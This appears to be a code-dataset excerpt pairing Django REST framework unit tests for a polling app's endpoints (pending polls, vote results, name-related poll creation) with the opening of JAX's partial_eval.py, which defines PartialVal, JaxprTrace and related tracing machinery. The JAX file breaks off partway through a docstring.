'result': False}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 1, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 3, 'result': True}, format='json') def test_get_results_3u_2p_1n_for_missing_user(self): response = self.client.get('/poll/getJoinResults/1/Zaray/') self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 2) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_2u_1p_1n_for_user(self): response = self.client.get('/poll/getJoinResults/2/Alex/') self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_2u_2p_0n_for_user(self): response = self.client.get('/poll/getJoinResults/3/Celine/') self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 2) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertIn('user', response.data) self.assertIn('id', response.data['user']) self.assertEqual(response.data['user']['id'], 3) def test_get_results_3u_0p_0n_for_user(self): response = self.client.get('/poll/getJoinResults/4/Bob/') self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 0) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertNotIn('user', response.data) def test_fail_get_results_for_missing_poll(self): response = self.client.get('/poll/getJoinResults/5/Alex/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class createNameRelatedPollTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2, 'name': 'Zaray'}, format='json') def test_create_nr_poll_w_unique_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 1, 'name': 'Bob'}) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_create_nr_poll_w_recurring_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 2, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_fail_create_nr_poll_w_matching_nr_poll_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 2, 'name': 'Zaray'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Unique", status_code=status.HTTP_400_BAD_REQUEST) def test_fail_create_nr_poll_w_matching_user_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 1, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Unique", status_code=status.HTTP_400_BAD_REQUEST) def test_fail_create_nr_poll_in_missing_space(self): response = self.client.post('/poll/createNameRelated/', {'space': 3, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Invalid", status_code=status.HTTP_400_BAD_REQUEST)
from django.test import TestCase from rest_framework import status from rest_framework.test import APIClient class getPendingPollsInSpaceTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 3}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': False}, format='json') def test_get_from_space_w_2_pending_polls(self): response = self.client.get('/poll/getPendingInSpace/1/') self.assertEqual(len(response.data), 2) def test_get_from_space_w_no_pending_polls(self): response = self.client.get('/poll/getPendingInSpace/2/') self.assertEqual(len(response.data), 0) def test_get_from_space_w_1_pending_poll(self): response = self.client.get('/poll/getPendingInSpace/3/') self.assertEqual(len(response.data), 1) def test_get_from_missing_space(self): response = self.client.get('/poll/getPendingInSpace/4/') self.assertEqual(len(response.data), 0) class getPendingPollsByUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2, 'status': True, 'name': 'Yun'}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2, 'status': True, 'name': 'Xiao'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3, 'status': True, 'name': 'Vivian'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3, 'status': False, 'name': 'Ua'}, format='json') def test_get_from_user_w_2_pending_polls(self): response = self.client.get('/poll/getPendingByUser/1/') self.assertEqual(len(response.data), 2) def test_get_from_user_w_no_pending_polls(self): response = self.client.get('/poll/getPendingByUser/2/') self.assertEqual(len(response.data), 0) def test_get_from_user_w_1_pending_poll(self): response = self.client.get('/poll/getPendingByUser/3/') self.assertEqual(len(response.data), 1) def test_get_from_missing_user(self): response = self.client.get('/poll/getPendingByUser/4/') self.assertEqual(len(response.data), 0) class getPendingUnvotedPollsForUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': False}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 5, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 6, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 7, 'user': 2, 'result': True}, format='json') def test_get_for_user_w_1_unvoted_poll(self): response = self.client.get('/poll/getPendingUnvotedForUser/1/') self.assertEqual(len(response.data), 1) def test_get_for_user_w_3_unvoted_polls(self): response = self.client.get('/poll/getPendingUnvotedForUser/2/') self.assertEqual(len(response.data), 3) def test_get_for_user_w_4_unvoted_polls(self): response = self.client.get('/poll/getPendingUnvotedForUser/3/') self.assertEqual(len(response.data), 4) def test_get_for_missing_user(self): response = self.client.get('/poll/getPendingUnvotedForUser/4/') self.assertEqual(len(response.data), 0) class getPendingJoinPollInSpaceByNameTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 1, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 1, 'status': True, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': False, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'name': 'Xiao'}, format='json') def test_get_unique_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/3/Xiao/') self.assertEqual(response.status_code, status.HTTP_200_OK) def test_get_recurring_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/1/Zaray/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertIn('space', response.data) self.assertEqual(response.data['space'], 1) def test_fail_get_missing_but_recurring_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/1/Xiao/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_recurring_name_from_missing_space(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/4/Zaray/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_join_poll(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/2/Yon/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_pending_poll(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/2/Zaray/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class getNamePollResultsInSpaceByUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Daphne', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 3}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 3}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 3, 'status': True, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 6, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'user': 8, 'name': 'Xiao'}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 3, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 4, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 5, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 7, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 5, 'user': 9, 'result': True}, format='json') def test_get_results_3u_1p_2n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/1/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 2) self.assertNotIn('user', response.data) def test_get_results_2u_1p_1n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/2/6/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_1u_1p_0n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/3/8/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 1) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertIn('user', response.data) def test_fail_get_by_user_w_no_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/4/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_for_missing_user(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/10/') def test_fail_get_non_name_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/2/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_pending_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/3/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class getJoinPollResultsTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Delphine', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 3, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 1, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 3, 'result': True}, format='json') def test_get_results_3u_2p_1n_for_missing_user(self): response = self.client.get('/poll/getJoinResults/1/Zaray/') self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 2) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_2u_1p_1n_for_user(self): response = self.client.get('/poll/getJoinResults/2/Alex/') self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_2u_2p_0n_for_user(self): response = self.client.get('/poll/getJoinResults/3/Celine/') self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 2) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertIn('user', response.data) self.assertIn('id', response.data['user']) self.assertEqual(response.data['user']['id'], 3) def test_get_results_3u_0p_0n_for_user(self): response = self.client.get('/poll/getJoinResults/4/Bob/') self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 0) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertNotIn('user', response.data) def test_fail_get_results_for_missing_poll(self): response = self.client.get('/poll/getJoinResults/5/Alex/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class createNameRelatedPollTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2, 'name': 'Zaray'}, format='json') def test_create_nr_poll_w_unique_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 1, 'name': 'Bob'}) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_create_nr_poll_w_recurring_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 2, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_fail_create_nr_poll_w_matching_nr_poll_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 2, 'name': 'Zaray'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Unique", status_code=status.HTTP_400_BAD_REQUEST) def test_fail_create_nr_poll_w_matching_user_name(self): response = self.client.post('/poll/createNameRelated/', {'space': 1, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Unique", status_code=status.HTTP_400_BAD_REQUEST) def test_fail_create_nr_poll_in_missing_space(self): response = self.client.post('/poll/createNameRelated/', {'space': 3, 'name': 'Alex'}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) self.assertContains(response, "Invalid", status_code=status.HTTP_400_BAD_REQUEST)
none
1
2.419676
2
jax/interpreters/partial_eval.py
dpiponi/jax
0
6627901
<reponame>dpiponi/jax # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import itertools as it from collections import namedtuple import contextlib import threading from typing import Callable, Dict, Optional, Sequence, Set, Tuple, Type, Union from weakref import ref import numpy as onp from .. import core from .. import linear_util as lu from ..abstract_arrays import ShapedArray, ConcreteArray, raise_to_shaped from ..ad_util import zero from ..util import (unzip2, safe_zip, safe_map, toposort, partial, split_list, wrap_name, cache) from ..core import (Trace, Tracer, new_master, Jaxpr, Literal, get_aval, AbstractValue, unit, unitvar, abstract_unit, TypedJaxpr, new_jaxpr_eqn) map = safe_map zip = safe_zip def identity(x): return x class PartialVal(tuple): """Partial value: either a known value or an unknown (abstract) value. Represented as a pair `(aval_opt, const)` of one of two kinds: * `(None, <Constant>)` indicates a known value, either a Python regular value, or a Tracer. * `(<AbstractValue>, *)` indicates an unknown value characterized by an abstract value. """ def __new__(cls, xs: Tuple[Optional[AbstractValue], core.Value]): pv, const = xs if not core.skip_checks: # type checks assert isinstance(pv, (AbstractValue, type(None))), xs assert isinstance(const, core.Tracer) or const is zero or core.valid_jaxtype(const), xs # invariant checks if isinstance(pv, AbstractValue): assert const == core.unit, xs return tuple.__new__(cls, xs) @classmethod def known(cls, const: core.Value) -> 'PartialVal': return PartialVal((None, const)) @classmethod def unknown(cls, aval: AbstractValue) -> 'PartialVal': return PartialVal((aval, core.unit)) def is_known(self): return self[0] is None def get_known(self) -> Optional[core.Value]: """Get the known value, if known, else None.""" return self[1] if self[0] is None else None def get_aval(self) -> AbstractValue: """Get the AbstractValue either directly for unknown values, or from the known constant.""" known = self.get_known() if known is not None: return get_aval(known) else: return self[0] def merge_with_known(self, val: core.Value) -> core.Value: """Either the stored known value, or the given 'val'.""" known = self.get_known() return known if known is not None else val # We form Jaxprs using `JaxprTrace` for three distinct purposes: # (1) to stage program representations completely out of the JAX system # (e.g. for XLA using jit or pmap). In this case we are using the # `StagingJaxprTrace` subclass. # (3) to linearize a function for reverse-mode AD. In this case we are # using the `JaxprTrace` subclass. # (2) to build a representation of a function that may require further JAX # transformations (e.g. in "initial-style" higher-order primitives, like # for control flow). In this case we use the `JaxprTrace` class. class JaxprTrace(Trace): def pure(self, val): return self.new_const(val) def lift(self, val): return self.new_const(val) def sublift(self, val): return JaxprTracer(self, val.pval, FreeVar(val)) def new_const(self, val): if isinstance(val, Tracer) and val._trace.level == self.level: raise Exception return JaxprTracer(self, PartialVal.known(val), unit) def new_instantiated_literal(self, val): return JaxprTracer(self, PartialVal.unknown(get_aval(val)), Literal(val)) def new_instantiated_const(self, val): return JaxprTracer(self, PartialVal.unknown(get_aval(val)), ConstVar(val)) def new_arg(self, pval: PartialVal): return JaxprTracer(self, pval, LambdaBinding()) def instantiate_const(self, tracer): const = tracer.pval.get_known() if const is None: return tracer else: if type(const) in core.literalable_types and onp.shape(const) == (): return self.new_instantiated_literal(const) else: return self.new_instantiated_const(const) def instantiate_const_abstracted(self, tracer): const = tracer.pval.get_known() if const is None: return tracer else: aval = raise_to_shaped(get_aval(const), onp.isscalar(const)) return JaxprTracer(self, PartialVal.unknown(aval), ConstVar(const)) def process_primitive(self, primitive, tracers, params): if primitive in custom_partial_eval_rules: return custom_partial_eval_rules[primitive](self, *tracers, **params) else: return self.default_process_primitive(primitive, tracers, params) def default_process_primitive(self, primitive, tracers, params): """By default, if all the input tracers are known, then execute the primitive and all the ouputs are known. Otherwise, all the outputs are unknown.""" consts = tuple(t.pval.get_known() for t in tracers) if all(c is not None for c in consts): return primitive.bind(*consts, **params) tracers = map(self.instantiate_const, tracers) avals = [t.aval for t in tracers] out_aval = primitive.abstract_eval(*avals, **params) if primitive.multiple_results: out_tracers = [JaxprTracer(self, PartialVal.unknown(aval), None) for aval in out_aval] eqn = new_eqn_recipe(tracers, out_tracers, primitive, params) for t in out_tracers: t.recipe = eqn return out_tracers else: out_tracer = JaxprTracer(self, PartialVal.unknown(out_aval), None) out_tracer.recipe = new_eqn_recipe(tracers, [out_tracer], primitive, params) return out_tracer def process_call(self, call_primitive, f: lu.WrappedFun, tracers, params): name = params.get('name', f.__name__) if (self.master.trace_type is StagingJaxprTrace and call_primitive in staged_out_calls): tracers = map(self.instantiate_const_abstracted, tracers) else: name = wrap_name(name, 'pe') params = dict(params, name=name) if call_primitive in call_partial_eval_rules: return call_partial_eval_rules[call_primitive](self, call_primitive, f, tracers, params) in_pvs, in_consts = unzip2([t.pval for t in tracers]) fun, aux = partial_eval(f, self, in_pvs) out_flat = call_primitive.bind(fun, *in_consts, **params) out_pvs, jaxpr, env = aux() env_tracers = map(self.full_raise, env) out_pv_consts, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) if not jaxpr.eqns: env = {core.unitvar: core.unit} map(env.setdefault, jaxpr.invars, (*env_tracers, *tracers)) map(env.setdefault, jaxpr.constvars, consts) return [pv_const if pv is None else v.val if type(v) is Literal else env[v] for v, pv, pv_const in zip(jaxpr.outvars, out_pvs, out_pv_consts)] const_tracers = map(self.new_instantiated_const, consts) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(self, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, call_jaxpr=lifted_jaxpr) # The `jaxpr` already contains the env_vars at start of invars eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers, tracers)), out_tracers, call_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers def post_process_call(self, call_primitive, out_tracers, params): jaxpr, consts, env = tracers_to_jaxpr([], out_tracers) out_pvs, out_pv_consts = unzip2(t.pval for t in out_tracers) out = out_pv_consts + consts del consts, out_pv_consts master = self.master def todo(x): n = len(jaxpr.outvars) out_pv_consts, consts = x[:n], x[n:] trace = JaxprTrace(master, core.cur_sublevel()) const_tracers = map(trace.new_instantiated_const, consts) env_tracers = map(trace.full_raise, env) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(trace, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, call_jaxpr=lifted_jaxpr) # The `jaxpr` already contains the env_vars at start of invars eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers)), out_tracers, call_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers return out, todo def process_map(self, map_primitive, f: lu.WrappedFun, tracers, params): name = params.get('name', f.__name__) if self.master.trace_type is StagingJaxprTrace: tracers = map(self.instantiate_const_abstracted, tracers) else: name = wrap_name(name, 'pe') params = dict(params, name=name) in_pvs, in_consts = unzip2([t.pval for t in tracers]) reduced_pvs = [None if pv is None else _mapped_aval(params['axis_size'], pv) if m else pv for pv, m in zip(in_pvs, params['mapped_invars'])] fun, aux = partial_eval(f, self, reduced_pvs) out_flat = map_primitive.bind(fun, *in_consts, **params) out_pvs_reduced, jaxpr, env = aux() out_pv_consts, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) out_pvs = [None if pv is None else _unmapped_aval(params['axis_size'], pv) for pv in out_pvs_reduced] const_tracers = map(self.new_instantiated_const, consts) env_tracers = map(self.full_raise, env) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(self, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] # The `jaxpr` already contains the env_vars at start of invars new_params = dict(params, mapped_invars=((True,) * len(const_tracers) + (False,) * len(env_tracers) + params['mapped_invars']), call_jaxpr=lifted_jaxpr) assert (len(new_params['mapped_invars']) == len(const_tracers) + len(env_tracers) + len(tracers)) eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers, tracers)), out_tracers, map_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers def post_process_map(self, map_primitive, out_tracers, params): jaxpr, consts, env = tracers_to_jaxpr([], out_tracers) out_pvs_reduced, out_pv_consts = unzip2(t.pval for t in out_tracers) out_pvs = [None if pv is None else _unmapped_aval(params['axis_size'], pv) for pv in out_pvs_reduced] out = out_pv_consts + consts del consts, out_pv_consts master = self.master def todo(x): n = len(jaxpr.outvars) out_pv_consts, consts = x[:n], x[n:] trace = JaxprTrace(master, core.cur_sublevel()) const_tracers = map(trace.new_instantiated_const, consts) # The `jaxpr` already contains the env_vars at start of invars lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(trace, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, mapped_invars=tuple([True] * len(const_tracers) + [False] * len(env)), call_jaxpr=lifted_jaxpr) env_tracers = map(trace.full_raise, env) eqn = new_eqn_recipe(it.chain(const_tracers, env_tracers), out_tracers, map_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers return out, todo def process_custom_jvp_call(self, prim, fun, jvp, tracers): # See comment at top of `JaxprTrace`. This method should be reachable # only when we stage out, and in that case we drop the custom differentiation # rules, because we do not need them. assert self.master.trace_type is StagingJaxprTrace return fun.call_wrapped(*tracers) def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees): # See comment in the above process_custom_jvp_call method. assert self.master.trace_type is StagingJaxprTrace return fun.call_wrapped(*tracers) # This subclass is used just for its type tag (see comment for `JaxprTrace`) # This switches the behavior of process_call to stage out into the jaxpr any # call primitives encountered (rather than doing partial evaluation into the call). class StagingJaxprTrace(JaxprTrace): pass def _mapped_aval(size, aval): if aval is core.abstract_unit: return aval elif isinstance(aval, ShapedArray): # might be raising abstraction level from Concrete here assert aval.shape[0] == size return ShapedArray(aval.shape[1:], aval.dtype) else: raise TypeError(aval) def _unmapped_aval(size, aval): if aval is core.abstract_unit: return aval elif isinstance(aval, ShapedArray): return ShapedArray((size,) + aval.shape, aval.dtype) else: raise TypeError(aval) custom_partial_eval_rules: Dict[core.Primitive, Callable] = {} call_partial_eval_rules: Dict[core.Primitive, Callable] = {} staged_out_calls: Set[core.Primitive] = set() def partial_eval(f, trace, pvs: Sequence[Optional[AbstractValue]], instantiate=False): f = trace_to_subjaxpr(f, trace.master, instantiate) return partial_eval_wrapper(f, tuple(pvs)) @lu.transformation_with_aux def partial_eval_wrapper(avals: Sequence[Optional[AbstractValue]], *consts): py_args = (map(PartialVal, zip(avals, consts)),) jaxpr, (out_pvals, consts, env) = yield py_args, {} out_pvs, out_consts = unzip2(out_pvals) out = tuple(out_consts) + tuple(consts) # TODO: can consts be traced? yield out, (out_pvs, jaxpr, env) def abstract_eval_fun(fun, *avals, **params): pvals_in = [PartialVal.unknown(a) for a in avals] _, pvals_out, _ = trace_to_jaxpr(lu.wrap_init(fun, params), pvals_in, instantiate=True, stage_out=True) avals_out, _ = unzip2(pvals_out) for aval_out in avals_out: assert isinstance(aval_out, AbstractValue) # instantiate=True return avals_out class JaxprTracer(Tracer): __slots__ = ['pval', 'recipe'] def __init__(self, trace, pval: PartialVal, recipe): assert isinstance(pval, PartialVal) pv, const = pval if isinstance(const, Tracer) and const._trace.level >= trace.level: raise core.escaped_tracer_error( "Tracer from a higher level: {} in trace {}".format(const, trace)) self._trace = trace self.pval = pval self.recipe = recipe def __repr__(self): return 'Traced<{}:{}>'.format(self.aval, self._trace) @property def aval(self): return self.pval.get_aval() @property def parents(self): if isinstance(self.recipe, JaxprEqnRecipe): return self.recipe.invars else: return [] def full_lower(self): known = self.pval.get_known() if known is not None: return core.full_lower(known) else: return self # TODO(necula): this should return a TypedJaxpr # TODO(necula): remove stage_out, replace trace_type=pe.StagingJaxprTrace def trace_to_jaxpr(fun: lu.WrappedFun, pvals: Sequence[PartialVal], instantiate: Union[bool, Sequence[bool]] = False, stage_out=False, bottom=False, trace_type: Optional[Type[Trace]] = None) \ -> Tuple[Jaxpr, Tuple[PartialVal, ...], Tuple[core.Value, ...]]: """Traces a function into a Jaxpr, given PartialVals for inputs. `trace_type` can be one of `StagingJaxprTrace` or `JaxprTrace` (see comments for that class). Returns (`jaxpr`, `out_pvals`, `consts`). The `jaxpr` contains only the computation that depends on unknown inputs. The `out_pvals` are the 